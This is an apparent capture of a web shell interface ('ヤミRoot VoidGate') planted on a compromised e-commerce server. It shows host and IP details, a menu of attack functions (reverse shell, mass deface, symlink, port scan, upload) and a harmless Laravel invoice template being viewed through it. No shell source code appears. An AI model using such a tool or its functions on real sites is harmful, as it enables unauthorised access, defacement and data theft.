ヤミRoot VoidGate
User / IP
:
216.73.217.162
Host / Server
:
15.235.182.215 / pollibazaar.com
System
:
Linux asia.cbnex.com 5.14.0-611.49.2.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 30 09:05:08 EDT 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
pollibazaar
/
public_html
/
storage
/
framework
/
views
/
Viewing: 43f35d4bf4a561cbe2abac324ffbd9f2.php
<html> <head> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Admin Earning Statement</title> <meta http-equiv="Content-Type" content="text/html;"/> <meta charset="UTF-8"> <style media="all"> * { margin: 0; padding: 0; line-height: 1.3; font-family: 'Inter', sans-serif; color: #333542; } /* IE 6 */ * html .footer { position: absolute; top: expression((0-(footer.offsetHeight)+(document.documentElement.clientHeight ? document.documentElement.clientHeight : document.body.clientHeight)+(ignoreMe = document.documentElement.scrollTop ? document.documentElement.scrollTop : document.body.scrollTop))+'px'); font-family: 'Inter', sans-serif; } body { font-size: .75rem; font-family: 'Inter', sans-serif; font-weight: 500; } img { max-width: 100%; } .customers { font-family: 'Inter', sans-serif; border-collapse: collapse; width: 100%; } table { width: 100%; } table thead th { padding: 8px; font-size: 11px; text-align: left; } table tbody th, table tbody td { padding: 8px; font-size: 11px; } table.fs-12 thead th { font-size: 12px; } table.fs-12 tbody th, table.fs-12 tbody td { font-size: 12px; } table.customers thead th { background-color: #0177CD; color: #fff; } table.customers tbody th, table.customers tbody td { background-color: #FAFCFF; } table.calc-table th { text-align: left; } table.calc-table td { text-align: right; } table.calc-table td.text-left { text-align: left; } .table-total { font-family: "Inter", sans-serif; } .text-left { text-align: left !important; } .pb-2 { padding-bottom: 8px !important; } .pb-3 { padding-bottom: 16px !important; } .text-right { text-align: right; } .content-position { padding: 15px 40px; } .content-position-y { padding: 0px 40px; } .text-white { color: white !important; } .bs-0 { border-spacing: 0; } .text-center { text-align: center; } .mb-1 { margin-bottom: 4px !important; } .mb-2 { margin-bottom: 8px !important; } .mb-4 { margin-bottom: 24px !important; } .mb-30 { margin-bottom: 30px !important; } .px-10 { padding-left: 10px; padding-right: 10px; } .fz-14 { font-size: 14px; } .fs-12 { font-size: 12px; } .fs-10 { font-size: 10px; } .font-normal { font-weight: 500; } .border-dashed-top { border-top: 1px dashed #ddd; } .font-weight-bold { font-weight: 700; } .bg-light { background-color: #F7F7F7; } .py-30 { padding-top: 30px; padding-bottom: 30px; } .py-4 { padding-top: 24px; padding-bottom: 24px; } .d-flex { display: flex; } .gap-2 { gap: 8px; } .flex-wrap { flex-wrap: wrap; } .align-items-center { align-items: center; } .justify-content-center { justify-content: center; } a { color: rgba(0, 128, 245, 1); } .p-1 { padding: 4px !important; } .h2 { font-size: 1.5em; margin-block-start: 0.83em; margin-block-end: 0.83em; margin-inline-start: 0px; margin-inline-end: 0px; font-weight: bold; } .h4 { margin-block-start: 1.33em; margin-block-end: 1.33em; margin-inline-start: 0px; margin-inline-end: 0px; font-weight: bold; } .footer { position: fixed; bottom: 0; width: 27%; } .max-w-595px { max-width: 595px; margin: 0 auto; background: #fff; } </style> </head> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&display=swap" rel="stylesheet"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"> <?php $companyLogo = getWebConfig(name: 'company_web_logo'); ?> <body> <div class="max-w-595px" style="min-height: 100vh; display:flex;flex-direction: column;"> <div class="first"> <table class="bs-0 mb-30 px-10"> <tr> <th class="content-position-y text-left"> <h2><?php echo e(translate('admin_Earning_Report')); ?></h2> <p class="fz-14"><?php echo e(translate('date')); ?> : <span style="font-weight: normal"><?php echo e(date('d/m/Y')); ?></span></p> </th> <th class="content-position-y text-right"> <?php ($invoiceSettings = getWebConfig(name: 'invoice_settings')); ?> <?php if(isset($invoiceSettings['invoice_logo_status']) && $invoiceSettings['invoice_logo_status'] == 1): ?> <?php if(isset($invoiceSettings['invoice_logo_type']) && $invoiceSettings['invoice_logo_type'] == 'default'): ?> <img height="40" src="<?php echo e(getStorageImages(path: getWebConfig(name: 'company_web_logo_png'), type:'backend-logo')); ?>" alt="" style="margin-bottom:5px;object-fit: contain"> <?php elseif(isset($invoiceSettings['invoice_logo_type']) && $invoiceSettings['invoice_logo_type'] == 'custom' && isset($invoiceSettings['image'])): ?> <img height="40" src="<?php echo e(getStorageImages(path: imagePathProcessing(imageData: $invoiceSettings['image'], path:'company'), type: 'backend-logo')); ?>" alt="" style="margin-bottom:5px;object-fit: contain"> <?php endif; ?> <?php endif; ?> </th> </tr> </table> </div> <div class=""> <section> <table class="content-position-y fs-12"> <tr> <td class="p-1"> <table> <tr> <td> <p class="fz-14"><b><?php echo e(translate('duration')); ?></b> : <?php echo e($earning_data['duration']); ?> </p> </td> </tr> </table> </td> </tr> </table> </section> </div> <br> <div class=""> <div class="content-position-y"> <table class="customers bs-0"> <tbody> <tr> <td style="background-color: #0177CD important; color: white; font-weight: bold"><?php echo e(translate('SL')); ?></td> <td style="background-color: #0177CD important; color: white; font-weight: bold"><?php echo e(translate('details')); ?></td> <td class="text-right" style="background-color: #0177CD important; color: white; font-weight: bold"><?php echo e(translate('amount')); ?></td> </tr> <tr> <td>1</td> <td><?php echo e(translate('in_House_earning')); ?></td> <td class="text-right"><?php echo e(\App\Utils\BackEndHelper::set_symbol(\App\Utils\BackEndHelper::usd_to_currency($earning_data['inhouse_earning']))); ?></td> </tr> <tr> <td>2</td> <td><?php echo e(translate('admin_Commission')); ?></td> <td class="text-right"><?php echo e(\App\Utils\BackEndHelper::set_symbol(\App\Utils\BackEndHelper::usd_to_currency($earning_data['admin_commission']))); ?></td> </tr> <tr> <td>3</td> <td><?php echo e(translate('earning_From_Shipping')); ?></td> <td class="text-right"><?php echo e(\App\Utils\BackEndHelper::set_symbol(\App\Utils\BackEndHelper::usd_to_currency($earning_data['shipping_earn']))); ?></td> </tr> <tr> <td>4</td> <td><?php echo e(translate('deliveryman_incentive')); ?></td> <td class="text-right"><?php echo e(\App\Utils\BackEndHelper::set_symbol(\App\Utils\BackEndHelper::usd_to_currency($earning_data['deliveryman_incentive']))); ?></td> </tr> <tr> <td>5</td> <td><?php echo e(translate('discount_Given')); ?></td> <td class="text-right"><?php echo e(\App\Utils\BackEndHelper::set_symbol(\App\Utils\BackEndHelper::usd_to_currency($earning_data['discount_given']))); ?></td> </tr> <tr> <td>6</td> <td><?php echo e(translate('total_Tax')); ?></td> <td class="text-right"><?php echo e(\App\Utils\BackEndHelper::set_symbol(\App\Utils\BackEndHelper::usd_to_currency($earning_data['total_tax']))); ?></td> </tr> <tr> <td>7</td> <td><?php echo e(translate('refund_Given')); ?></td> <td class="text-right"><?php echo e(\App\Utils\BackEndHelper::set_symbol(\App\Utils\BackEndHelper::usd_to_currency($earning_data['refund_given']))); ?></td> </tr> <tr> <td colspan="2" class="text-right"> <b><?php echo e(translate('total_Earning')); ?></b> </td> <td class="text-right"> <b><?php echo e(\App\Utils\BackEndHelper::set_symbol(\App\Utils\BackEndHelper::usd_to_currency($earning_data['total_earning']))); ?></b> </td> </tr> </tbody> </table> </div> </div> <br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br> <div class="row" style="margin-top: auto"> <section> <table class=""> <tr> <th class="content-position-y bg-light py-4 footer"> <div class="d-flex justify-content-center gap-2"> <div class="mb-2"> <i class="fa fa-phone"></i> <?php echo e(translate('phone')); ?> : <?php echo e($company_phone); ?> </div> <div class="mb-2"> <i class="fa fa-envelope" aria-hidden="true"></i> <?php echo e(translate('email')); ?> : <?php echo e($company_email); ?> </div> </div> <div class="mb-2"> <?php echo e(url('/')); ?> </div> <div> <?php echo e(translate('all_copy_right_reserved_©_'.date('Y').'_').$company_name); ?> </div> </th> </tr> </table> </section> </div> </div> </body> </html> <?php /**PATH /home/pollibazaar/public_html/resources/views/admin-views/report/admin-earning-duration-wise-pdf.blade.php ENDPATH**/ ?>
Coded With 💗 by
0x6ick